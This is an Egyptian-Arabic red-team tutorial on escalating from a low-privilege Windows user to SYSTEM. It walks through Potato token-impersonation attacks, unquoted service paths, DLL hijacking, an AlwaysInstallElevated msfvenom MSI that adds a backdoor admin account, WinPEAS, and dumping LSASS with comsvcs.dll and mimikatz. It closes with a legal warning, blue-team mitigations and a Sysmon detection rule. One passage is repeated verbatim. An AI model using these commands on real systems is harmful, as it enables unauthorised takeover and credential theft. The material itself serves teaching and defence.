الفرق الحمراء — الهجوممتقدم90mL45
Windows Privilege Escalation — وصول SYSTEM
Token impersonation و service abuse و UAC bypass و DLL hijack
#Windows#PrivEsc#Tokens#UAC#DLL Hijack#WinPEAS
من low-priv user إلى NT AUTHORITY\\SYSTEM
تشبيه — شرح مبسط
يعني إيه إنت user عادي على Windows؟ يعني إنت بتتفرّج على شاشة بنسبة 10٪ من الجهاز. ليه نقعد كده؟
- طب أنا user عادي، ايه اللي أنا أقدر أعمله أصلاً يا حضرتك؟؟
يا مستجد، الـ user العادي عنده صلاحية كتابة في أماكن أكتر مما تتخيل. وفيه service نسي الـ admin يقفلها صح. وفيه scheduled task شغّال SYSTEM وبيشغّل سكربت من فولدر إنت كاتب فيه. اللعبة مش "ايه اللي عندي"، اللعبة "ايه اللي مغلطه".
Windows زي قلعة فيها مئات الأبواب الصغيرة. المفروض كلها متقفلة، بس دايماً فيه باب حد نسيه مفتوح. تصعيد الصلاحيات في Windows = إنك تلاقي الأبواب دي: خدمة بـ path ضعيف، DLL برنامج بيدوّر عليه في مكان إنت تقدر تكتب فيه، token عملية تانية إنت تقدر تسرقه.
SYSTEM في Windows أعلى من Administrator في حالات معينة (الوصول للذاكرة، LSASS، tokens). معظم تصعيد الصلاحيات على Windows هدفه يطلع SYSTEM لأنه ده الباب اللي بيفتحلك credential dumping و persistence حقيقي. أقل من كده شغل ناقص.
في 2022، PrintNightmare (CVE-2021-34527) ضرب كل سيرفر Windows على وجه الأرض. أي domain user يقدر يبقى SYSTEM على أي host شغّال Print Spooler. مايكروسوفت أصدرت 4 patches قبل ما يقفلوها صح. شركات لسة شغّالة بـ Print Spooler مفعّل في 2026.
- طب أنا user عادي، ايه اللي أنا أقدر أعمله أصلاً يا حضرتك؟؟
يا مستجد، الـ user العادي عنده صلاحية كتابة في أماكن أكتر مما تتخيل. وفيه service نسي الـ admin يقفلها صح. وفيه scheduled task شغّال SYSTEM وبيشغّل سكربت من فولدر إنت كاتب فيه. اللعبة مش "ايه اللي عندي"، اللعبة "ايه اللي مغلطه".
Windows زي قلعة فيها مئات الأبواب الصغيرة. المفروض كلها متقفلة، بس دايماً فيه باب حد نسيه مفتوح. تصعيد الصلاحيات في Windows = إنك تلاقي الأبواب دي: خدمة بـ path ضعيف، DLL برنامج بيدوّر عليه في مكان إنت تقدر تكتب فيه، token عملية تانية إنت تقدر تسرقه.
SYSTEM في Windows أعلى من Administrator في حالات معينة (الوصول للذاكرة، LSASS، tokens). معظم تصعيد الصلاحيات على Windows هدفه يطلع SYSTEM لأنه ده الباب اللي بيفتحلك credential dumping و persistence حقيقي. أقل من كده شغل ناقص.
في 2022، PrintNightmare (CVE-2021-34527) ضرب كل سيرفر Windows على وجه الأرض. أي domain user يقدر يبقى SYSTEM على أي host شغّال Print Spooler. مايكروسوفت أصدرت 4 patches قبل ما يقفلوها صح. شركات لسة شغّالة بـ Print Spooler مفعّل في 2026.
غلطات الـ junior على Windows
- يلاقي SeImpersonate ويولّع GodPotato من غير ما يفحص الـ Defender. الـ binary معروف من اسمه.
- يجرّب JuicyPotato على Server 2019+. ما بيشتغلش. اعمل بحث الأول قبل ما تجرب.
- ينسى يفحص الـ Unquoted Service Paths. كنز قديم لسة موجود في 2026.
- يعمل mimikatz من غير ما يحقن في عملية موثوقة. الـ EDR بيشوفه قبل ما يكمّل اسم الـ binary.
الاستطلاع الأولي
powershell
# هوية وامتيازات
whoami /all
whoami /priv # الامتيازات الحالية — أهم سؤال
# معلومات النظام
systeminfo
$PSVersionTable
# الخدمات
Get-Service | Where-Object Status -eq 'Running'
Get-WmiObject Win32_Service | Select Name, PathName, StartName
# المهام المجدولة
Get-ScheduledTask | Where-Object State -eq 'Ready'
# Patches المثبّتة (لمقارنتها بـ Windows-Exploit-Suggester)
Get-HotFix | Sort InstalledOn -Descending | Select -First 20أهم خمس قنوات تصعيد
01
Privilege abuse — SeImpersonate / SeAssignPrimaryToken
لو whoami /priv ورّاك SeImpersonatePrivilege يبقى إنت قريب جداً من SYSTEM. ده اللي اسمه Potato attacks (RoguePotato, JuicyPotato, GodPotato, SigmaPotato). من هنا للسما.
powershell
# على Windows Server 2019+:
.\GodPotato.exe -cmd "cmd /c whoami"
# => nt authority\system02
Unquoted Service Path
خدمة عندها path زي C:\\Program Files\\My App\\service.exe من غير quotes، وعندك صلاحية كتابة على C:\\Program Files\\My.exe؟ Windows هيحاول يشغّله. خرم كلاسيكي.
powershell
# ابحث عنها:
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows" | findstr /i /v """
# لو وجدت، استبدل My.exe بـ payload و أعد تشغيل الخدمة03
Service Binary / DLL Hijacking
لو الخدمة شغالة كـ SYSTEM وملفها قابل للكتابة منك، استبدله ببساطة. أو لو بتستدعي DLL مش موجود في ترتيب البحث، حط DLL خبيث في طريقها.
powershell
# تحقق من ACL:
icacls "C:\Path\To\service.exe"
# ابحث عن BUILTIN\Users:F أو NT AUTHORITY\Authenticated Users:F04
Always Install Elevated
مفتاح registry يفرض تشغيل MSI installers بصلاحيات SYSTEM، حتى لو شغّلهم مستخدم عادي.
powershell
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# لو الاثنين = 1:
msfvenom -p windows/x64/exec CMD='cmd /c net user pwn P@ssw0rd /add && net localgroup administrators pwn /add' -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi05
UAC Bypass
ليست تصعيداً تقنياً (admin → admin)، لكنها مفيدة لـ Medium Integrity → High. Examples: fodhelper.exe، eventvwr.exe، computerdefaults.exe.
WinPEAS — الأتمتة
$ iwr -Uri https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -O C:\temp\wp.exe
$ C:\temp\wp.exe -applicationsinfo -systeminfo -windowscreds
[+] SeImpersonatePrivilege — Enabled (Potato!)
[!] Unquoted service: VulnSvc -> C:\Program Files\My App\service.exe
[!] AlwaysInstallElevated = 1 (HKCU+HKLM)
Credential Dumping بعد SYSTEM
بمجرد الوصول إلى SYSTEM، LSASS يصبح الهدف. هذا يعطيك hashes و TGT و tokens لتحريك جانبي.
powershell
# تفريغ LSASS بدون أداة معروفة
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full
# تحليل لاحق على آلتك
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"تحذير قانوني
سرقة tokens و LSASS من نظام لا تملكه = تجاوز 18 U.S.C. § 1030. كل ما هنا للمختبرات المعزولة أو engagements مع authorization مكتوب.
اللي بيشتغل فعلاً للـ Blue Team
- راقب SeImpersonatePrivilege abuse: child process من IIS / SQL Server بصلاحية SYSTEM = مشبوه
- Credential Guard لحماية LSASS (Windows 10+ Enterprise)
- Disable AlwaysInstallElevated في كل GPO
- راجع service paths شهرياً — لا unquoted
- EDR تحدد signatures لأدوات Potato عائلة
- راقب comsvcs.dll!MiniDump calls (Sysmon Event 10 على lsass)
Sysmon detection rules
xml
<Sysmon schemaversion="4.82">
<EventFiltering>
<RuleGroup name="LSASS Access" groupRelation="or">
<ProcessAccess onmatch="include">
<TargetImage condition="end with">lsass.exe</TargetImage>
<GrantedAccess condition="is">0x1010</GrantedAccess>
</ProcessAccess>
</RuleGroup>
</EventFiltering>
</Sysmon>الخلاصة الناشفة
Windows privesc عبارة عن 3 أسئلة تسألهم لنفسك:
1. whoami /priv ورّاك إيه؟ SeImpersonate موجود؟ خلاص، GodPotato.
2. فيه service بـ unquoted path وإنت تقدر تكتب في الـ folder؟ خلاص، DLL hijack.
3. فيه scheduled task شغّال SYSTEM وبيشغّل سكربت إنت تقدر تعدّله؟ خلاص.
الـ junior بيشغّل WinPEAS ويتفرّج على الـ output 5 دقايق ويقول "مفيش حاجة".
الـ pro بيقرا كل سطر، ويفهم ليه الأداة لوّنته أحمر.
السكة من low-priv لـ SYSTEM متفتحة في 80٪ من السيرفرات اللي شفتها. مش علشان Windows ضعيف — علشان admins بيركّبوا وينسوا.
اوعى تفتح WinPEAS وتقفل في دقيقتين. اقعد على الـ output لحد ما تفهم كل سطر أحمر بيحصل ليه.
مصادر
- HackTricks — Windows Local Privilege Escalation
- SpecterOps — Atomic Red Team T1134
- MITRE ATT&CK — TA0004 Privilege Escalation
- Microsoft Security Compliance Toolkit